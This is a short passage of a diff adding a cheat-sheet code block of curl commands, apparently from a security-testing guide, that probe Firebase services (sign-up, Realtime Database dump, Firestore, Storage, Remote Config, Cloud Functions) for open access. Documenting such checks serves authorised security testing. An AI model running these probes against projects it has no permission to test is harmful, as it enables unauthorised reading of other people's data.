"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=API_KEY"
|
|
786
|
+
|
|
787
|
+
# Realtime Database
|
|
788
|
+
curl "https://PROJECT.firebaseio.com/.json"
|
|
789
|
+
curl "https://PROJECT.firebaseio.com/.json?shallow=true"
|
|
790
|
+
|
|
791
|
+
# Firestore
|
|
792
|
+
curl "https://firestore.googleapis.com/v1/projects/PROJECT/databases/(default)/documents"
|
|
793
|
+
|
|
794
|
+
# Storage
|
|
795
|
+
curl "https://firebasestorage.googleapis.com/v0/b/PROJECT.appspot.com/o"
|
|
796
|
+
|
|
797
|
+
# Remote Config
|
|
798
|
+
curl -H "x-goog-api-key: API_KEY" \
|
|
799
|
+
"https://firebaseremoteconfig.googleapis.com/v1/projects/PROJECT/remoteConfig"
|
|
800
|
+
|
|
801
|
+
# Cloud Functions
|
|
802
|
+
curl "https://us-central1-PROJECT.cloudfunctions.net/functionName"
|
|
803
|
+
```
|